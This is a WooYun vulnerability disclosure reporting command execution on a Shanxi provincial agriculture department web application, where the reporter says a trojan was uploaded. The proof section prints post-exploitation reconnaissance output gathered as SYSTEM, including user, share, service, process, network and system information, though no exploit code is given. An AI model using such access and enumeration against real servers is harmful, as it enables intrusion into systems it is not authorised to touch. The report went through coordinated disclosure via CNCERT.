漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0164596
漏洞标题:山西省农业厅某系统服务器getshell
相关厂商:www.sxnyt.gov.cn
漏洞作者: 朱元璋
提交时间:2015-12-25 16:18
修复时间:2016-02-09 23:29
公开时间:2016-02-09 23:29
漏洞类型:系统/服务补丁不及时
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-12-25: 细节已通知厂商并且等待厂商处理中
2015-12-29: 厂商已经确认,细节仅向厂商公开
2016-01-08: 细节向核心白帽子及相关领域专家公开
2016-01-18: 细节向普通白帽子公开
2016-01-28: 细节向实习白帽子公开
2016-02-09: 细节向公众公开
简要描述:
根据省编办《关于山西省农业厅所属事业单位清理规范意见的通知》(晋编办字﹝2010﹞99号),设立山西省蔬菜产业管理站,正处级建制,内设办公室、技术推广科、产业管理科3个科,现有在职职工12人,其中共产党员9名,民盟盟员1名。现有农业技术推广研究员3名,高级农艺师4名,农艺师3名。
详细说明:
确定系统是农业厅,是根据这个地址介绍http://**.**.**.**/newsView.aspx?id=1684
地址**.**.**.**:8080/agri/sm/login.action存在命令执行漏洞
直接上传木马到服务器中
漏洞证明:
<code>
[*] 磁盘列表 [ A:C:D:E: ]
D:\agri\apache-tomcat-6.0.37\webapps\agri\agri\> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET away
Guest IUSR_USER-0C1D0D58D2 IWAM_USER-0C1D0D58D2
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。
系统找不到指定的路径。
D:\agri\apache-tomcat-6.0.37\bin\> net share
共享名 资源 注释
-------------------------------------------------------------------------------
IPC$ 远程 IPC
ADMIN$ C:\WINDOWS 远程管理
D$ D:\ 默认共享
C$ C:\ 默认共享
命令成功完成。
D:\agri\apache-tomcat-6.0.37\bin\> net view
列表是空的。
D:\agri\apache-tomcat-6.0.37\bin\> net start
已经启动以下 Windows 服务:
Apache Tomcat 6
Application Experience Lookup Service
Application Layer Gateway Service
Automatic Updates
COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Java Quick Starter
Logical Disk Manager
MySQL
Network Connections
Network Location Awareness (NLA)
Plug and Play
Print Spooler
Protected Storage
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Terminal Services
VMTools
Windows Firewall/Internet Connection Sharing (ICS)
Windows Management Instrumentation
Windows Search
Windows Time
Wireless Configuration
Workstation
命令成功完成。
D:\agri\apache-tomcat-6.0.37\bin\> whoami
nt authority\system
D:\agri\apache-tomcat-6.0.37\bin\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP **.**.**.**:135 **.**.**.**:0 LISTENING 688
TCP **.**.**.**:445 **.**.**.**:0 LISTENING 4
TCP **.**.**.**:1026 **.**.**.**:0 LISTENING 424
TCP **.**.**.**:3306 **.**.**.**:0 LISTENING 1172
TCP **.**.**.**:8009 **.**.**.**:0 LISTENING 1344
TCP **.**.**.**:8080 **.**.**.**:0 LISTENING 1344
TCP **.**.**.**:33899 **.**.**.**:0 LISTENING 1328
TCP **.**.**.**:8080 **.**.**.**:50762 ESTABLISHED 1344
TCP **.**.**.**:1025 **.**.**.**:0 LISTENING 2072
TCP **.**.**.**:1068 **.**.**.**:3306 ESTABLISHED 1344
TCP **.**.**.**:1069 **.**.**.**:3306 ESTABLISHED 1344
TCP **.**.**.**:1070 **.**.**.**:3306 ESTABLISHED 1344
TCP **.**.**.**:3306 **.**.**.**:1068 ESTABLISHED 1172
TCP **.**.**.**:3306 **.**.**.**:1069 ESTABLISHED 1172
TCP **.**.**.**:3306 **.**.**.**:1070 ESTABLISHED 1172
TCP **.**.**.**:5152 **.**.**.**:0 LISTENING 1144
TCP **.**.**.**:8005 **.**.**.**:0 LISTENING 1344
UDP **.**.**.**:445 *:* 4
UDP **.**.**.**:500 *:* 424
UDP **.**.**.**:4500 *:* 424
UDP **.**.**.**:123 *:* 788
UDP **.**.**.**:123 *:* 788
UDP **.**.**.**:1067 *:* 788
D:\agri\apache-tomcat-6.0.37\bin\> tasklist /svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 288 暂缺
csrss.exe 336 暂缺
winlogon.exe 360 暂缺
services.exe 412 Eventlog, PlugPlay
lsass.exe 424 PolicyAgent, ProtectedStorage, SamSs
svchost.exe 596 DcomLaunch
svchost.exe 688 RpcSs
svchost.exe 752 Dhcp, Dnscache
svchost.exe 788 LmHosts, W32Time
svchost.exe 804 AeLookupSvc, Browser, CryptSvc, dmserver,
EventSystem, helpsvc, lanmanserver,
lanmanworkstation, Netman, Nla, Schedule,
seclogon, SENS, SharedAccess,
ShellHWDetection, TrkWks, winmgmt,
wuauserv, WZCSVC
spoolsv.exe 916 Spooler
msdtc.exe 952 MSDTC
svchost.exe 1108 ERSvc
jqs.exe 1144 JavaQuickStarterService
mysqld.exe 1172 MySQL
svchost.exe 1228 RemoteRegistry
svchost.exe 1328 TermService
tomcat6.exe 1344 Tomcat6
vmtoolsd.exe 1456 VMTools
searchindexer.exe 1504 WSearch
dllhost.exe 2036 COMSysApp
alg.exe 2072 ALG
csrss.exe 2676 暂缺
winlogon.exe 2704 暂缺
rdpclip.exe 2900 暂缺
explorer.exe 2976 暂缺
vmtoolsd.exe 3116 暂缺
jusched.exe 3140 暂缺
ctfmon.exe 3148 暂缺
wmiprvse.exe 3512 暂缺
conime.exe 2796 暂缺
logon.scr 3420 暂缺
cmd.exe 2772 暂缺
tasklist.exe 2680 暂缺
wmiprvse.exe 2548 暂缺
D:\agri\apache-tomcat-6.0.37\bin\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : ZWCN2003--8565
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-98-32-17
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : **.**.**.**
Subnet Mask . . . . . . . . . . . : **.**.**.**
Default Gateway . . . . . . . . . : **.**.**.**
DNS Servers . . . . . . . . . . . : **.**.**.**
NetBIOS over Tcpip. . . . . . . . : Disabled
D:\agri\apache-tomcat-6.0.37\bin\> systeminfo
主机名: ZWCN2003--8565
OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本: 5.2.3790 Service Pack 2 Build 3790
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: user
注册的组织: user
产品 ID: 69813-650-2765717-45706
初始安装日期: 2014-10-29, 23:29:39
系统启动时间: 1 天 2 小时 5 分 57 秒
系统制造商: VMware, Inc.
系统型号: VMware Virtual Platform
系统类型: X86-based PC
处理器: 安装了 2 个处理器。
[01]: x86 Family 6 Model 62 Stepping 4 GenuineIntel ~2099 Mhz
[02]: x86 Family 6 Model 62 Stepping 4 GenuineIntel ~2099 Mhz
BIOS 版本: INTEL - 6040000
Windows 目录: C:\WINDOWS
系统目录: C:\WINDOWS\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: zh-cn;中文(中国)
时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 1,023 MB
可用的物理内存: 552 MB
页面文件: 最大值: 934 MB
页面文件: 可用: 326 MB
页面文件: 使用中: 608 MB
页面文件位置: 暂缺
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 330 个修补程序。
[01]: File 1
[02]: File 1
[03]: File 1
[04]: File 1
[05]: File 1
[06]: File 1
[07]: File 1
[08]: File 1
[09]: File 1
[10]: File 1
[11]: File 1
[12]: File 1
[13]: File 1
[14]: File 1
[15]: File 1
[16]: File 1
[17]: File 1
[18]: File 1
[19]: File 1
[20]: File 1
[21]: File 1
[22]: File 1
[23]: File 1
[24]: File 1
[25]: File 1
[26]: File 1
[27]: File 1
[28]: File 1
[29]: File 1
[30]: File 1
[31]: File 1
[32]: File 1
[33]: File 1
[34]: File 1
[35]: File 1
[36]: File 1
[37]: File 1
[38]: File 1
[39]: File 1
[40]: File 1
[41]: File 1
[42]: File 1
[43]: File 1
[44]: File 1
[45]: File 1
[46]: File 1
[47]: File 1
[48]: File 1
[49]: File 1
[50]: File 1
[51]: File 1
[52]: File 1
[53]: File 1
[54]: File 1
[55]: File 1
[56]: File 1
[57]: File 1
[58]: File 1
[59]: File 1
[60]: File 1
[61]: File 1
[62]: File 1
[63]: File 1
[64]: File 1
[65]: File 1
[66]: File 1
[67]: File 1
[68]: File 1
[69]: File 1
[70]: File 1
[71]: File 1
[72]: File 1
[73]: File 1
[74]: File 1
[75]: File 1
[76]: File 1
[77]: File 1
[78]: File 1
[79]: File 1
[80]: File 1
[81]: File 1
[82]: File 1
[83]: File 1
[84]: File 1
[85]: File 1
[86]: File 1
[87]: File 1
[88]: File 1
[89]: File 1
[90]: File 1
[91]: File 1
[92]: File 1
[93]: File 1
[94]: File 1
[95]: File 1
[96]: File 1
[97]: File 1
[98]: File 1
[99]: File 1
[100]: File 1
[101]: File 1
[102]: File 1
[103]: File 1
[104]: File 1
[105]: File 1
[106]: File 1
[107]: File 1
[108]: File 1
[109]: File 1
[110]: File 1
[111]: File 1
[112]: File 1
[113]: File 1
[114]: File 1
[115]: File 1
[116]: File 1
[117]: File 1
[118]: File 1
[119]: File 1
[120]: File 1
[121]: File 1
[122]: File 1
[123]: File 1
[124]: File 1
[125]: File 1
[126]: File 1
[127]: File 1
[128]: File 1
[129]: File 1
[130]: File 1
[131]: File 1
[132]: File 1
[133]: File 1
[134]: File 1
[135]: File 1
[136]: Fi
修复方案:
加强安全意识
版权声明:转载请注明来源 朱元璋@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2015-12-29 17:37
厂商回复:
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给山西分中心,由山西分中心后续协调网站管理单位处置。
最新状态:
暂无